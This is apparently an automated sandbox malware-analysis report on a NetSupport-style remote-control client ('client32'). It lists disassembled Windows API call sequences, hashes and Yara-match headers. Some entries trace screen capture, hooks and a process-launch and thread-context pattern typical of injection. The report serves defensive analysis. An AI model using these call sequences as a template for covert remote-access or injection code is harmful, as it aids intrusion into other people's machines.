                                                                                                                                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2137077337-0
                                                                                                                                                                                                    • Opcode ID: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                                                                                                    • Instruction ID: 7e8c35b226adcaf9db255fe0cc88c7d1a69018d15e21d4c5589b92f150ef4e8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81746d2f9acf91c020a5a3f6663b8b5426944b6bd56996d575389eba168b1fdf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19114876F00615ABDB119F90CDC0AAEF778EF46A19F244164EC06DB200E734BE518BE2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 111619FB
                                                                                                                                                                                                      • Part of subcall function 1116A682: GetCurrentProcess.KERNEL32(C0000417,110B7069,?,1119DD14), ref: 1116A698
                                                                                                                                                                                                      • Part of subcall function 1116A682: TerminateProcess.KERNEL32(00000000), ref: 1116A69F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentDecrementInterlockedTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3889136465-0
                                                                                                                                                                                                    • Opcode ID: 6cc01d460da6e9e8a6d9ac2a242b1bdfcbe20bfdd012fd6d770efdbb2dfa342e
                                                                                                                                                                                                    • Instruction ID: ecc366bbc7a0c1c23f87f8e5166af85a2a886dca55a83ee52fc5275e0f83c624
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cc01d460da6e9e8a6d9ac2a242b1bdfcbe20bfdd012fd6d770efdbb2dfa342e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB13B75A0061A9FDB65CF64C990BE9F7F9EF49304F1184AAE509E7240EB71AA90CF40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073F39
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                    • Opcode ID: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction ID: a025be61f5cc20f5ad5b88b5485e82962b2b8b991e0ff8e486065cca72918f8b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe1c8bf948e3278c6afe26251c548f96935120539d1bb6977252444f6bedd71d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A21B076E00228A7DB10DE59EC45BEFFBB8FB44314F0041AAF9099B240E7759A54CBE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76596610,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3660427363-0
                                                                                                                                                                                                    • Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                                                                                    • Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,689DD3C1,689D6E81,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7), ref: 689D1BAE
                                                                                                                                                                                                      • Part of subcall function 689D5E97: GetModuleFileNameW.KERNEL32(00000000,689FD8AA,00000104,00000001,00000000,689D6E81), ref: 689D5F33
                                                                                                                                                                                                      • Part of subcall function 689D5B34: ExitProcess.KERNEL32 ref: 689D5B45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1715456479-0
                                                                                                                                                                                                    • Opcode ID: 4b52e5b9babb192850fc18f173268e56c3ef4bc8fa25d7fd71eb406b265bffde
                                                                                                                                                                                                    • Instruction ID: 7899eee96e7a9f492e39278b2c4e105135519c84a96ebd27647bb3fd2500cc43
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b52e5b9babb192850fc18f173268e56c3ef4bc8fa25d7fd71eb406b265bffde
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B301963B248B02EAF2161B7AEC40B3A765CEBD3378F908035EA1596184EB69C440C66C
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4114910276-0
                                                                                                                                                                                                    • Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                                                                                    • Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,689D6F16,00000000,?,689DD40B,00000001,689D6F16,00000000,00000000,00000000,?,689D6F16,00000001,00000214), ref: 689DA0C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: e02d8b8aba1edf324b968844284117670651138563c471c810779975d5a5fffe
                                                                                                                                                                                                    • Instruction ID: 057c492e804845e7543354a72628dae225a7a84197342cc88a34d97a73c30f6f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e02d8b8aba1edf324b968844284117670651138563c471c810779975d5a5fffe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1601B131309A12DEFB198E25DC14B6B37D8AB82368F40C529E827EB1C0DB75D420C688
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                                                                                    • Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 1108853A
                                                                                                                                                                                                      • Part of subcall function 1110CA30: GetCurrentThreadId.KERNEL32 ref: 1110CA5A
                                                                                                                                                                                                      • Part of subcall function 1110CA30: EnterCriticalSection.KERNEL32(00000000,?,1106FB37,?), ref: 1110CA69
                                                                                                                                                                                                      • Part of subcall function 1110CA30: LeaveCriticalSection.KERNEL32(00000000,?,00000000,?), ref: 1110CADC
                                                                                                                                                                                                      • Part of subcall function 11088380: GetCurrentThreadId.KERNEL32 ref: 110883A1
                                                                                                                                                                                                      • Part of subcall function 11088380: SetWindowsHookExA.USER32(00000002,Function_00087920,00000000,00000000), ref: 110883B1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalCurrentSectionThread$EnterHookIncrementInterlockedLeaveWindowswsprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1508900759-0
                                                                                                                                                                                                    • Opcode ID: fca1b46b204764da65ebcedeecad0e2b38446ff2d182421d1514713d23eeeec3
                                                                                                                                                                                                    • Instruction ID: da2f38d9cbc473f07d4b13dca6b82d7cbc026d14235019096d9071f05e5fbb6d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fca1b46b204764da65ebcedeecad0e2b38446ff2d182421d1514713d23eeeec3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0E57AD4062527E200F6E47825BEEB3455F6035DF048072FA096A280E9717664CBE7
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,689D58A5,689F7218,00000008,689D5A49,?,?,?,689F7238,0000000C,689D5B04,?), ref: 689D6088
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                                                                                    • Opcode ID: adb144a28f8b83f1c7a7eedf518151a204718ae7a7decebfd1de558f06024669
                                                                                                                                                                                                    • Instruction ID: 576b965404aa79700ffc1f291c93def55d986c3ad0287cf08f35f5653f91a1ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: adb144a28f8b83f1c7a7eedf518151a204718ae7a7decebfd1de558f06024669
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC092B03893039BFB5C5B38AE16B4E25986B0EB52FA0402DB217D96C4DBE09450AA04
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70080837782.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_400000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Client32@8
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 433899448-0
                                                                                                                                                                                                    • Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                                                                                    • Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,1117CF74,?), ref: 110875A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 32694325-0
                                                                                                                                                                                                    • Opcode ID: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                                                                                    • Instruction ID: 75295544d9195e04375e6fd21bc40551df4152833ee3a01bc0b81666db33725f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4e878cd1fd140643e157a6277fb3a3afa25cdd61848936763f5ef659ccc3049
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 711157B0902B148FC3A4CF7A89816C6FAE5BB48315F90892E96EEC2200DB716564CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,110B7069,?,1119DD14), ref: 111665B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 39696e6d25aa7ac0e21d789071e397267f2798b2839d93ba8aa49f10ff34e9cf
                                                                                                                                                                                                    • Instruction ID: 296e91402cad22b18ee9dfb762b3befe9381d00e4202b5104261f8b257269074
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39696e6d25aa7ac0e21d789071e397267f2798b2839d93ba8aa49f10ff34e9cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56E0EC3250016657C7124E79D941B49BF5DDB812B8F140B31F93CC61C4E7729952C391
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 1100776A
                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 11007771
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 1100779D
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110077AA
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078B4
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110078C2
                                                                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 110078D6
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110078E3
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078F5
                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 11007921
                                                                                                                                                                                                      • Part of subcall function 11002280: DeleteObject.GDI32(?), ref: 11002291
                                                                                                                                                                                                      • Part of subcall function 11002280: CreatePen.GDI32(?,?,?), ref: 110022B8
                                                                                                                                                                                                      • Part of subcall function 11005AF0: CreateSolidBrush.GDI32(?), ref: 11005B17
                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1100794B
                                                                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 11007960
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1100796D
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1100797A
                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007997
                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 110079C6
                                                                                                                                                                                                    • CreatePen.GDI32(00000002,00000001,00000000), ref: 110079D1
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11007AC2
                                                                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11007AD0
                                                                                                                                                                                                    • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007AE7
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: GetObjectA.GDI32(11003D26,00000018,?), ref: 1113E9E3
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: CreateCompatibleDC.GDI32(00000000), ref: 1113E9F1
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: CreateCompatibleDC.GDI32(00000000), ref: 1113E9F6
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EA0E
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1113EA21
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EA2C
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,?), ref: 1113EA36
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 1113EA53
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,00000000), ref: 1113EA5C
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetTextColor.GDI32(00000000,00FFFFFF), ref: 1113EA68
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 1113EA85
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,?), ref: 1113EA90
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SetTextColor.GDI32(00000000,00000000), ref: 1113EA99
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 1113EAB6
                                                                                                                                                                                                      • Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EAC1
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007BE5
                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 11007C1F
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000), ref: 11007C26
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007C33
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11007D76
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 11007DB3
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 11007DD3
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 11007DF0
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007E40
                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007906
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 11007E72
                                                                                                                                                                                                    • SetCursor.USER32(?), ref: 11007E7F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdatewsprintf
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$|ZvZv
                                                                                                                                                                                                    • API String ID: 2899290145-901002432
                                                                                                                                                                                                    • Opcode ID: 32ac4362a435372818458c6baefe4143da28b80c04a0e07f18060c40f5c1fe2f
                                                                                                                                                                                                    • Instruction ID: 7fe4da3f96bb6b92752a65c8f73994b4eca8bbb8cb15b396b098bd7e1d307798
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32ac4362a435372818458c6baefe4143da28b80c04a0e07f18060c40f5c1fe2f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72272B5A00719AFE750DF64CC88FDEF7B9BB48708F1085A9E65A97280DB74A940CF50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 111235C6
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 111235E5
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112362B
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11123673
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,111B3308,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112369F
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236AC
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236C7
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 111236D7
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 111236F1
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112371D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112372E
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11123737
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112373A
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 11123770
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11123812
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123815
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123818
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112382C
                                                                                                                                                                                                    • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111238D4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileHandleProcess$CloseCreate$Current$ModuleName$ContextDuplicatePathTempThreadVersionWritewsprintf
